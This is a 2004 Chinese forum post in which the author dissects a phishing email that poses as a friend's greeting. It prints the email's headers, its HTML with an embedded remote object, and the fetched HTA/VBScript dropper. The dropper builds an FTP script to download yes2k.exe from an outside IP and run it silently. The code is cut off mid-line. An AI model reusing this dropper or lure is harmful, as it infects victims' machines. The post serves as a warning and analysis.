今天是从封闭中解脱出来的第二天,早晨收取邮件,接到一封来自<zhangxq@163.com>张雪倩的邮件,标题是“好久没和你联系了,见面你要请我吃饭哦”的邮件。邮件全文告诉我,这是一封加在木马程序的邮件。
邮件原始信息如下:
Return-Path: <zhangxq@163.com>
Delivered-To: umemory@vip.sina.com
Received: (qmail 37715 invoked from network); 28 Apr 2004 08:45:42 -0000
Received: from unknown (HELO 163.com) (211.97.246.5)
by 202.108.35.192 with SMTP; 28 Apr 2004 08:45:42 -0000
Received: from(zhangxq@163.com) to(umemory@vip.sina.com)
Received: Sina Anti-Spam System(Bad Helo Domain)
From: =?GB2312?B?1cXRqdm7?= <zhangxq@163.com>
Subject: =?GB2312?B?ztLSqrvYwLTAsqOsxOPXvLG4x+u/zcW2?=
To: umemory@vip.sina.com
Content-Type: text/html;charset="GB2312"
Reply-To: zhangxq@163.com
Date: Wed, 28 Apr 2004 16:45:21 +0800
X-Priority: 3
X-Mailer: Foxmail 4.2 [cn]
<BR>好久没和你联系了,真不好意思。我下月就回来了,嘻嘻!到时候你要请我吃饭哦
,你电话没变吧?到时候我回来就给你电话。好久没有写信了,现在感觉写东西变生疏了。<BR>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<META name="GENERATOR" content="IBM HomePage Builder 2001 V5.0.0 for Windows">
<TITLE></TITLE>
</HEAD>
<OBJECT data="http://211.92.52.196/22/yes2k.test"></OBJECT>
</HTML>
察看了一下http://211.92.52.196/22/yes2k.test的内容,如下:
<html>
<HTA:APPLICATION caption="no" border="none" showInTaskBar="yes" windowState="minimize">
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script language="VBScript">
Dim fs, t
Set fs = CreateObject("Scripting.FileSystemObject")
Set t = fs.CreateTextFile("yes2k.txt",True)
t.WriteLine("open 211.92.52.196")
t.WriteLine("ftp")
t.WriteLine("any@any.net")
t.WriteLine("bin")
t.WriteLine("lcd c:")
t.WriteLine("get yes2k.exe")
t.WriteLine("bye")
t.Close
wsh.Run "ftp -s:yes2k.txt",0,true
wsh.Run |
匿名
发表于 2004-4-29 09:09:27
发表于 2004-4-29 09:42:13